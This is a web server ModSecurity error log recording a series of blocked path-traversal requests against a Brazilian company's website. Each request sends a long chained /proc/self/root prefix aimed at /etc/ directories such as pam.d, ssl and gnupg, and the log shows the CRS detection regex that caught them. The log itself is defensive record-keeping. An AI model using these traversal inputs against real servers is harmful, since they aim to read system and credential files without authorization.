[Fri Mar 20 09:02:55.453539 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.243.128:38634] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03bxCii7xarUs8iHZz2wAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:02:58.351220 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.243.128:38648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03cvXLqtnMIWvjpaKm1gAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:02:59.696230 2026] [:error] [pid 9818:tid 140411624429312] [client 74.7.243.128:35718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03c11pVZ5mVmJwsFM-MgAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:01.028140 2026] [:error] [pid 11642:tid 140411699963648] [client 74.7.243.128:35728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03dbninkcc-iUj5ApqOgAAA4U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:02.419127 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:35736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03dta6ubjKNq_cu4biewAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:03.703079 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.243.128:35738] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03dzJ3M9BSuKP7CAYrMQAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:04.971936 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:35748] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03eNa6ubjKNq_cu4bigAAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:06.895108 2026] [:error] [pid 31215:tid 140411574073088] [client 74.7.243.128:35760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03egF0L0L-SsrnPo507gAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:08.279804 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.243.128:35766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03fPqxLDW4GITHUkT14QAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:10.702190 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.243.128:47620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03ffqxLDW4GITHUkT15AAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:12.087040 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.243.128:47626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03gBCii7xarUs8iHZz4gAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:13.563976 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.243.128:47630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03gRCii7xarUs8iHZz5AAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:14.923873 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.243.128:47646] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03ggF0L0L-SsrnPo508wAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:16.308071 2026] [:error] [pid 11642:tid 140411716749056] [client 74.7.243.128:47660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03hLninkcc-iUj5ApqQQAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:17.672421 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:47666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03hda6ubjKNq_cu4biiAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:19.735027 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.243.128:47680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03hgF0L0L-SsrnPo509wAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:22.104132 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.243.128:50894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03ifqxLDW4GITHUkT18gAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:24.026839 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.243.128:50900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03jPqxLDW4GITHUkT1-AAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:25.360828 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.243.128:50908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03jfXLqtnMIWvjpaKm7wAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:26.775102 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.243.128:50924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03jrninkcc-iUj5ApqTgAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:28.495602 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.243.128:50938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03kPqxLDW4GITHUkT1_QAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
